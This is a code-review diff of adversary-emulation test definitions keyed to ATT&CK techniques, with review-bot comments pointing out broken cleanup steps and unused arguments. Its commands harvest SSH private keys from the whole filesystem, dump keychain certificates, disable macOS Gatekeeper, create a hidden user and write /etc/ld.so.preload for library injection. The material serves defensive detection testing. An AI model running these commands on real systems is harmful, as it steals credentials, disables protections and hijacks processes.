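Review bot: The added `cleanup_command` for the CP atomic runs `rm #{output_folder}` on a directory created by `mkdir` and populated by `cp --parents`, so it fails with an is-a-directory error and the copied private keys remain on disk; use `rm -rf #{output_folder}` as the rsync atomic's cleanup in the last hunk of this file does. Leaving collected key material behind defeats the purpose of a cleanup step, so this one is worth fixing before merge.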
@@ -55,6 +67,10 @@ atomic_tests:
- macos
- linux
input_arguments:
+ search_path:
+ description: Path where to start searching from.
+ type: path
+ default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -62,6 +78,9 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
- find / -name id_rsa -exec rsync -R {} #{output_folder} \;
- find / -name id_dsa -exec rsync -R {} #{output_folder} \;
- name: sh
\ No newline at end of file
+ find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
+ find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \;
+ cleanup_command: |
+ rm -rf #{output_folder}
+ name: sh
+
\ No newline at end of file
diff --git a/atomics/T1553.001/T1553.001.yaml b/atomics/T1553.001/T1553.001.yaml
index 29de7fe1..ed174aa8 100644
--- a/atomics/T1553.001/T1553.001.yaml
+++ b/atomics/T1553.001/T1553.001.yaml
@@ -16,4 +16,5 @@ atomic_tests:
command: |
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
- name: sh
\ No newline at end of file
+ elevation_required: true
+ name: sh
diff --git a/atomics/T1555.001/T1555.001.yaml b/atomics/T1555.001/T1555.001.yaml
index cdc9c380..1e53ce65 100644
--- a/atomics/T1555.001/T1555.001.yaml
+++ b/atomics/T1555.001/T1555.001.yaml
@@ -17,9 +17,18 @@ atomic_tests:
[Keychain dumper](https://github.com/juuso/keychaindump)
supported_platforms:
- macos
+ input_arguments:
+ cert_import:
+ description: Specify the path of the certificates to import.
+ type: path
+ default: /tmp/certs.pem
+ cert_export:
+ description: Specify the path of the certificates to export.
+ type: path
+ default: /tmp/certs.pem
executor:
command: |
security -h
- security find-certificate -a -p > allcerts.pem
- security import /tmp/certs.pem -k
- name: sh
\ No newline at end of file
+ security find-certificate -a -p > #{cert_export}
+ security import #{cert_export} -k
+ name: sh
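Review bot: `cert_import` is declared as an input argument but never referenced — both new command lines use `#{cert_export}`, so the import reads back the file just exported and changing `cert_import` has no effect; the second line should be `security import #{cert_import} -k`. Having both defaults point at `/tmp/certs.pem` masks the mix-up. There is also no `cleanup_command` removing `#{cert_export}`, which holds every certificate dumped from the keychains and stays in `/tmp` after the run.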
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml
index f920e406..13a1b1f6 100644
--- a/atomics/T1560.001/T1560.001.yaml
+++ b/atomics/T1560.001/T1560.001.yaml
@@ -153,15 +153,13 @@ atomic_tests:
- description: |
Files to zip must exist (#{input_files})
prereq_command: |
- ls #{input_files}
+ if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo Please set input_files argument to include files that exist
executor:
name: sh
elevation_required: false
- prereq_command: |
- ls #{input_files} > /dev/null
command: |
zip #{output_file} #{input_files}
cleanup_command: |
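Review bot: The new prerequisite `if [ $(ls #{input_files} | wc -l) > 0 ]` does not compare numbers: inside `[ … ]` the `>` is shell output redirection, so the test degenerates to `[ N ]` (true for any non-empty count, including `0`) and a file literally named `0` is created in the working directory on every run. Use an arithmetic comparison and silence ls: `if [ "$(ls #{input_files} 2>/dev/null | wc -l)" -gt 0 ]; then exit 0; else exit 1; fi;`. Removing the duplicated `prereq_command` from the executor block is correct.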
diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml
index b0ce7692..340a8ca2 100644
--- a/atomics/T1564.001/T1564.001.yaml
+++ b/atomics/T1564.001/T1564.001.yaml
@@ -100,6 +100,11 @@ atomic_tests:
Hide a directory on MacOS
supported_platforms:
- macos
+ input_arguments:
+ filename:
+ description: path of file to hide
+ type: path
+ default: /tmp/evil
executor:
command: |
touch /var/tmp/T1564.001_mac.txt
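Review bot: The new `filename` argument (default `/tmp/evil`) is not referenced by the visible executor line, which still hard-codes `touch /var/tmp/T1564.001_mac.txt`; unless the rest of the command, which continues past this hunk, uses `#{filename}`, the argument is dead and its description `path of file to hide` misleads the user. Either substitute it into the command (`touch #{filename}` and the hide step that follows) or drop the block.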
diff --git a/atomics/T1564.002/T1564.002.yaml b/atomics/T1564.002/T1564.002.yaml
index fc8e8064..de822dc9 100644
--- a/atomics/T1564.002/T1564.002.yaml
+++ b/atomics/T1564.002/T1564.002.yaml
@@ -15,4 +15,7 @@ atomic_tests:
executor:
command: |
sudo dscl . -create /Users/#{user_name} UniqueID 333
- name: sh
\ No newline at end of file
+ cleanup_command: |
+ sudo dscl . -delete /Users/#{username}
+ elevation_required: true
+ name: sh
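Review bot: The cleanup references `#{username}` while the command uses `#{user_name}`, so the placeholder is never substituted and the cleanup runs `sudo dscl . -delete /Users/#{username}` literally, leaving the test account with UniqueID 333 on the host; change it to `sudo dscl . -delete /Users/#{user_name}`. The argument definition is outside this hunk, so confirm which spelling it declares — the existing command line has been using `user_name`.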
diff --git a/atomics/T1569.001/T1569.001.yaml b/atomics/T1569.001/T1569.001.yaml
index 840b6279..11df555e 100644
--- a/atomics/T1569.001/T1569.001.yaml
+++ b/atomics/T1569.001/T1569.001.yaml
@@ -7,7 +7,18 @@ atomic_tests:
Utilize launchctl
supported_platforms:
- macos
+ input_arguments:
+ executable_path:
+ description: Path of the executable to run.
+ type: path
+ default: /System/Applications/Calculator.app/Contents/MacOS/Calculator
+ label_name:
+ description: Path of the executable to run.
+ type: string
+ default: evil
executor:
command: |
- launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
- name: sh
\ No newline at end of file
+ launchctl submit -l #{label_name} -- #{executable_path}
+ cleanup_command: |
+ launchctl remove #{label_name}
+ name: bash
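Review bot: The `label_name` description is a copy of the one above it (`Path of the executable to run.`), but the value is the launchd job label passed to `launchctl submit -l` and later to `launchctl remove`; write `Label of the launchd job to submit.`. The new default `executable_path` under `/System/Applications` only exists on macOS 10.15 and later, whereas the replaced line used `/Applications`, which is worth stating in the description so the prerequisite is explicit.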
diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml
index c75a5006..399ee53f 100644
--- a/atomics/T1574.006/T1574.006.yaml
+++ b/atomics/T1574.006/T1574.006.yaml
@@ -29,7 +29,8 @@ atomic_tests:
executor:
command: |
sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
- cleanup_command: ""
+ cleanup_command: |
+ sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
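Review bot: The new cleanup `sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload` uses `/` as the address delimiter while the substituted value is a filesystem path containing `/`, so sed sees the address end at the path's first slash and exits with an error, leaving the preload entry in place — exactly the case a cleanup exists to prevent. Use an alternative delimiter, `sudo sed -i '\|#{path_to_shared_library}|d' /etc/ld.so.preload`, which is still a genuine improvement over the previous empty `cleanup_command: ""`.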